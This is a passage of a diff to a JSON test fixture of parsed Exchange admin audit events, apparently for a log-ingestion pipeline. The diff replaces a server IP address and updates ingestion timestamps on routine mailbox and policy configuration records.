"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177731300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853274600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4645,12 +4645,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4693,7 +4693,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4705,8 +4705,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177735Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853278600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4726,12 +4726,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4763,7 +4763,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4775,8 +4775,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177737900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853283300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4796,12 +4796,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4831,7 +4831,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4843,8 +4843,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177741100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853288300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4864,12 +4864,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4914,7 +4914,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -4926,8 +4926,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177743900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853293300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -4947,12 +4947,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4995,7 +4995,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5007,8 +5007,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177748Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853299500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5028,12 +5028,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5076,7 +5076,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -5088,8 +5088,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177753Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 